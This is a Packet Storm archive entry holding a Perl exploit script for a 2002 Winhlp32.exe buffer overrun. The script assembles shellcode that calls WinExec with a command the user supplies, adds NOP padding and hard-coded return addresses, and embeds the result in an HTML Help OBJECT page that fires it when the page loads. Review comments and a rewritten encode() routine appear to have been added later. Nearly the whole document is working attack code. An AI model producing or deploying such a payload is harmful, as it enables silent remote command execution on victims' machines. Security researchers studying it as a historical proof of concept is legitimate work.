HelpMe.pl

2002-08-13T00:00:00
ID PACKETSTORM:26541
Type packetstorm
Reporter Gary O'Leary-Steele
Modified 2002-08-13T00:00:00

Description

                                        
                                            `# Winhlp32.exe Remote BufferOverrun exploit code. written by Gary O'leary-Steele Sec-1 Ltd. Garyo@sec-1.com  
# For use as proof of concept  
# Kernel32.dll version 5.0.2195.4272  
####### Kernel32 jmp ebx 77E87793  
  
  
# NOTE(review): the script has no `use strict` / `use warnings`, so every
# variable below is a package global.  encode() (defined further down) appears
# to read this global $command rather than its argument -- see the note there.
#
# Stage-1 stub.  The author's comments in the header tie the hard-coded
# addresses to one specific kernel32.dll build (5.0.2195.4272); the bytes are
# left exactly as published and are not annotated beyond the author's own
# remarks.
$sploit =  
"\x55\x8b\xec\x8b\xc3". #xc5 is ebp change if error  
"\xbe\xff\xff\xff\xff".  
"\x81\xEE\x85\x85\x85\x85".  
"\x83\xc0\x01".  
"\x8b\x10".  
"\x3b\xd6".  
"\x75\xf7".   
"\x8b\xd8".  
"\x83\xc3\x01".  
"\x80\x6b\x03\x41".  
"\x8b\x7b\x04".  
"\x81\xff\x58\x58\x58\x58".  
"\x75\xEE".  
"\x81\x6b\x04\x58\x58\x58\x58".  
"\x33\xf6".  
"\x56".  
"\x83\xc0\x04".  
"\x50".  
"\xbb\x94\xee\xe8\x77". # mov ebx, 0x77e8ee94 winexec() address  
"\xff\xd3"; #call ebx  
  
  
# Stage-2 stub, placed after the NOP padding in $exploit below; also built
# around a hard-coded address, so equally build-specific.
$exitproc =   
"\xBB\x5d\xa9\xe8\x77".  
"\x83\xeb\x01".  
"\xff\xd3";  
  
  
# Overwrite values appended at the very end of the payload.  The author notes
# which $EIP2 variant worked for them; the alternatives stay commented out.
$RET = "\x24\xF1\x5d\x01";  
$EIP2 = "\x93\x77\xe8\x77"; # This works  
#$EIP2 = "\xf6\xbf\x30\x78";  
  
# direct jump = 0006FBD4 ##$EIP2 = "\xd4\xfb\x06\x00";  
  
print "Exploit code for Winhlp32.exe Remote BufferOverrun.\nBy Gary Oleary-Steele Sec-1 Ltd\nCalls WinExec SW_HIDE and executes supplied command\nTested on windows 2000 professional SP2\n\n";  
# Interactive input: the command string and the output path are both taken
# from STDIN as-is; only the trailing newline is stripped.
print "Enter Command to execute: ";  
$command =<STDIN>;  
print "Enter Output File: ";  
$outputfile =<STDIN>;  
chomp $command;  
chomp $outputfile;  
# NOTE(review): two-argument open with the user-supplied path interpolated
# into the mode string, a bareword handle, and no error check -- if the open
# fails the final print below silently writes nothing.  The three-argument
# form (`open my $fh, '>', $outputfile or die "open $outputfile: $!"`) keeps
# the path separate from the mode and reports failure; the handle is also
# never closed explicitly.
open(INFILE,">$outputfile");  
# encode() shifts every character of the command by 65 (see the sub below);
# the shifted form is what gets embedded.
$command = encode($command);  
# Pad the encoded command to a fixed 123-byte region with NOPs (\x90).
$nn = 123 - length($command);  
$nops = "\x90" x $nn;  
  
  
  
# Payload layout, in order: stage-1 stub, "zzzz" literal, encoded command,
# "XXXX" literal, NOP padding, stage-2 stub, $RET, $EIP2.
$exploit = $sploit . "zzzz". $command .'XXXX'. $nops .$exitproc. $RET .$EIP2;  
  
  
  
  
# HTML wrapper, part 1: an <OBJECT> tag for the HTML Help control whose
# Item1 PARAM value is left open (single quote) so $exploit can be spliced
# in as that value.
$f1= <<"file1";   
<OBJECT classid=clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11  
codeBase=hhctrl.ocx#Version=4,72,8252,0 height=0 id=winhelp  
type=application/x-oleobject width=0><PARAM NAME="Width"  
VALUE="26"><PARAM NAME="Height" VALUE="26"><PARAM NAME="Command"  
VALUE="WinHelp"><PARAM NAME="Item1"  
VALUE='  
file1  
# Drop the heredoc's trailing newline so the payload follows the quote directly.
chomp $f1;  
  
# HTML wrapper, part 2: closes the Item1 value and the object, then a script
# line that invokes HHClick() on the object.
$f2= <<"file2";  
'><PARAM  
NAME="Item2" VALUE="Sec-1 LTD"></OBJECT>  
<SCRIPT>winhelp.HHClick()</SCRIPT>  
file2  
  
# Write the assembled document.  Neither this print nor the handle is checked
# or closed, so buffered write errors would go unreported.
print INFILE $f1.$exploit.$f2;  
  
  
  
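# Shift every character of $command up by 65 and return the result.
#
# This is the only transformation applied to the user-supplied command string
# before it is embedded by the caller.  The original declared the sub as
# `sub encode($command)`, which without the signatures feature is a prototype,
# not a parameter, so the body read the caller's package global $command
# instead; arguments are now unpacked from @_.  The accumulator is lexical and
# initialised, so a second call no longer appends to the previous result and
# an empty input returns '' rather than undef.  The inner 65-iteration
# increment loop is replaced by a single addition.  The encoded string is
# still echoed to STDOUT, as before.
#
# Parameters:
#   $command - string to encode; undef is treated as the empty string
# Returns:
#   the encoded string, one character per input character
# Limitation (unchanged from the original): input characters with an ordinal
#   above 190 map to code points above 255, which no longer fit in one byte.
sub encode {
    my ($command) = @_;
    my $SHIFT = 65;    # same offset as the original's 65-step increment loop

    $command = '' unless defined $command;

    # Per-character shift; split // yields one element per character.
    my $newchar = join '', map { chr( ord($_) + $SHIFT ) } split //, $command;

    print $newchar;    # diagnostic echo kept for compatibility
    return $newchar;
}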
  
  
  
  
`